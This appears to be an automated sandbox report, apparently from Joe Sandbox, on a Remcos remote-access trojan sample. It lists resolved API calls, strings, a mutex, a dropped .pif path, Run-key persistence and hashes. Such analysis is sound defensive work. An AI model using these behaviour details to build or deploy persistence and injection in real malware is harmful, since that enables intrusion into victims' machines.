                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000104), ref: 0040E9EE
                                                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                        • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\Public\Libraries\nmfsxfjX.pif$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-L24XL1$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                        • API String ID: 2830904901-3468781824
                                                                                        • Opcode ID: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                        • Opcode Fuzzy Hash: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                        • API String ID: 4236061018-3687161714
                                                                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                                        • CopyFileW.KERNELBASE(C:\Users\Public\Libraries\nmfsxfjX.pif,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                                        • CopyFileW.KERNEL32(C:\Users\Public\Libraries\nmfsxfjX.pif,00000000,00000000), ref: 0040CF84
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                        • String ID: 6$C:\Users\Public\Libraries\nmfsxfjX.pif$del$open
                                                                                        • API String ID: 1579085052-3703211178
                                                                                        • Opcode ID: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                                        • Opcode Fuzzy Hash: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                        • API String ID: 82841172-425784914
                                                                                        • Opcode ID: 27fe91012a163c2b4846bfbe880e9f299d57e6666512bed227f78a6c4b2faef2
                                                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                                        • Opcode Fuzzy Hash: 27fe91012a163c2b4846bfbe880e9f299d57e6666512bed227f78a6c4b2faef2
                                                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 782494840-2070987746
                                                                                        • Opcode ID: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                                        • Opcode Fuzzy Hash: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Control-flow graph (legend: Executed / Not Executed)
                                                                                        • Blocks: 656 [413814-413827: RegCreateKeyW]; 657 [413866]; 658 [413829-413864: call 40247c, call 401f04, RegSetValueExW, RegCloseKey]; 659 [413868-413876: call 401f09]
                                                                                        • Edges: 656->657, 656->658, 657->659, 658->659
                                                                                        APIs
                                                                                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                                                                        • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,762337E0,?), ref: 0041384D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,762337E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                        • API String ID: 1818849710-1051519024
                                                                                        • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                                        • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Control-flow graph (legend: Executed / Not Executed)
                                                                                        • Blocks: 666 [40d069-40d095: call 401fab, CreateMutexA, GetLastError]
                                                                                        APIs
                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastMutex
                                                                                        • String ID: Rmc-L24XL1
                                                                                        • API String ID: 1925916568-2965804744
                                                                                        • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                        • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Control-flow graph (legend: Executed / Not Executed)
                                                                                        • Blocks: 669 [4135a6-4135d2: RegOpenKeyExA]; 670 [4135d4-4135fc: RegQueryValueExA, RegCloseKey]; 671 [413607]; 672 [413609]; 673 [4135fe-413605]; 674 [41360e-41361a: call 402093]
                                                                                        • Edges: 669->670, 669->671, 670->672, 670->673, 671->672, 672->674, 673->674
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3677997916-0
                                                                                        • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                                        • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                                                        • _free.LIBCMT ref: 0044F41A
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free_free
                                                                                        • String ID:
                                                                                        • API String ID: 2716640707-0
                                                                                        • Opcode ID: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                                                                        • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                                                                        • Opcode Fuzzy Hash: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                                                                        • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 677 413549-413571 RegOpenKeyExA 678 4135a0 677->678 679 413573-41359e RegQueryValueExA RegCloseKey 677->679 680 4135a2-4135a5 678->680 679->680
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                                                                        • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3677997916-0
                                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 723 446137-446143 724 446175-446180 call 4405dd 723->724 725 446145-446147 723->725 732 446182-446184 724->732 726 446160-446171 RtlAllocateHeap 725->726 727 446149-44614a 725->727 730 446173 726->730 731 44614c-446153 call 445545 726->731 727->726 730->732 731->724 735 446155-44615e call 442f80 731->735 735->724 735->726
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
